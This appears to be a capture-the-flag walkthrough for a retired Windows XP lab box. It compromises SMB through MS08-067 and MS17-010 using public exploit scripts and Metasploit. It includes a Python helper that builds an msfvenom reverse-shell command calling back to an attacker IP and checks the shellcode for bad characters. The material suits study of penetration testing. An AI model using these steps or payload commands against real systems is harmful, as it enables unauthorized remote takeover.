Reconnaissance
Enumeration
Exploitation
Windows Privilege Escalation
Windows Privilege Escalation with Metasploit
________________________________________
Reconnaissance
Run the nmapAutomator.sh script to automate the recon/enumeration steps. The scan shows two open TCP ports, 139 (NetBIOS session service) and 445 (SMB), which points at a Windows host exposing file sharing.
Enumeration
The nmapAutomator Vuln scan (nmap's smb-vuln-* NSE scripts) reports two vulnerabilities, MS08-067 and MS17-010. Either one yields a shell with SYSTEM privileges directly, because the vulnerable code runs as NT AUTHORITY\SYSTEM (MS08-067, in the Server service) or in the kernel (MS17-010, in srv.sys), so no separate privilege escalation step is needed.
MS08-067
Download the exploit code (the public Python MS08-067 exploit) and generate the shellcode for it with msfvenom.
Paste the generated shellcode into the Python script, replacing the shellcode block already in it.
Before launching the exploit we need the target's exact OS version and service pack, which the nmapAutomator scan result (SMB OS discovery) gives us. The script's usage text lists the supported targets; choosing the wrong one uses the wrong return address and will usually crash the Server service instead of returning a shell:
print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 3 for Windows 2003 SP0 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 4 for Windows 2003 SP1 English\n'
print 'Example: MS08_067.py 192.168.1.1 5 for Windows XP SP3 French (NX)\n'
print 'Example: MS08_067.py 192.168.1.1 6 for Windows XP SP3 English (NX)\n'
print 'Example: MS08_067.py 192.168.1.1 7 for Windows XP SP3 English (AlwaysOn NX)\n'
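As an added example (not part of the original walkthrough or of the exploit script), the following Python shows the msfvenom invocation used to produce shellcode for this script and a check to run on the output before pasting it in: it decodes msfvenom's -f py output back into bytes and verifies that none of the bad characters the exploit cannot carry survived encoding. The bad-character list is the one the public script documents in its header comment; whether your copy uses the same set, the LHOST/LPORT values, and the sample shellcode bytes are assumptions or constructed for illustration.

```python
import re

# Bad characters the classic Python MS08-067 exploit (MS08_067.py / 7132.py)
# cannot carry in its shellcode; msfvenom is told to avoid them with -b.
# Assumption: your copy of the script uses this same set; it is listed in the
# comment above the shellcode block in the script, so check it there.
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"


def msfvenom_command(lhost, lport, var="shellcode"):
    """Build the msfvenom command that produces Python-format shellcode for
    the script: x86 Windows reverse shell, EXITFUNC=thread so only the
    exploited thread exits and the Server service stays up, the bad
    characters above excluded, output as a Python variable named `var`."""
    badchars = "".join("\\x%02x" % b for b in BADCHARS)
    cmd = ("msfvenom -p windows/shell_reverse_tcp LHOST=%s LPORT=%d "
           "EXITFUNC=thread -a x86 --platform windows -b \"%s\" -f py -v %s")
    return cmd % (lhost, lport, badchars, var)


# One `name = b""` line followed by `name += b"\x.."` lines; older msfvenom
# versions emit plain "..." literals without the b prefix, so it is optional.
_LINE = re.compile(r'^\s*(\w+)\s*(\+?=)\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_py_shellcode(text):
    """Decode msfvenom -f py output back into raw bytes. Lines that are not
    part of the buffer (comments, blank lines) are ignored."""
    data = bytearray()
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            data += bytes.fromhex(m.group(3).replace("\\x", ""))
    return bytes(data)


def check_shellcode(text, max_len=None):
    """Return (ok, findings). The shellcode passes when it decodes to at least
    one byte, contains none of BADCHARS and, if max_len is given, fits the
    space the exploit script offers (max_len is an assumed budget; set it to
    what your copy of the script can hold)."""
    sc = parse_py_shellcode(text)
    findings = []
    for i, b in enumerate(sc):
        if b in BADCHARS:
            findings.append("bad char 0x%02x at offset %d" % (b, i))
    if max_len is not None and len(sc) > max_len:
        findings.append("shellcode is %d bytes, limit %d" % (len(sc), max_len))
    if not sc:
        findings.append("no shellcode found in input")
    return (not findings, findings)


# Constructed samples in the shape msfvenom -f py emits (illustrative bytes,
# not real shellcode). The second one contains 0x00 and 0x2e and must be
# rejected; in practice that means the -b list was wrong or omitted.
CLEAN_SAMPLE = r'''shellcode =  b""
shellcode += b"\xfc\xe8\x82\x90\x90"
shellcode += b"\x60\x89\xe5"
'''
BAD_SAMPLE = r'''shellcode =  b""
shellcode += b"\x31\xc0\x00\x2e\x90"
'''

if __name__ == "__main__":
    print(msfvenom_command("10.10.14.2", 443))  # assumed attacker IP/port
    for name, text in (("clean", CLEAN_SAMPLE), ("bad", BAD_SAMPLE)):
        ok, findings = check_shellcode(text)
        print(name, "OK" if ok else "REJECT", findings)
```

Run the printed msfvenom command, save its output to a file, and pass the file's contents to check_shellcode before pasting the variable into the script; a rejected buffer means the encoder did not honour the bad-character list and the exploit would corrupt its own request.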
Exploitation
Start the listener first, then run the exploit against the target with the matching target number; the shellcode connects back and we get a shell with SYSTEM privileges (NT AUTHORITY\SYSTEM), so no further privilege escalation is needed.
Windows Privilege Escalation with Metasploit
The same vulnerability can also be exploited with Metasploit (the exploit/windows/smb/ms08_067_netapi module), as shown in the image below; the module fingerprints the target automatically and likewise lands as SYSTEM.
MS17-010
Download the Python scripts send_and_execute.py and mysmb.py (send_and_execute.py imports mysmb.py, so both must sit in the same directory). send_and_execute.py exploits MS17-010 over SMB to upload our payload executable to the target and execute it as SYSTEM.
Generate the payload executable with msfvenom, start the listener, then run the exploit with the target IP and the payload file as arguments; the payload connects back and we get a SYSTEM shell.
User flag is in “C:\Documents and Settings\john\Desktop” directory and root flag is in “C:\Documents and Settings\Administrator\Desktop” directory.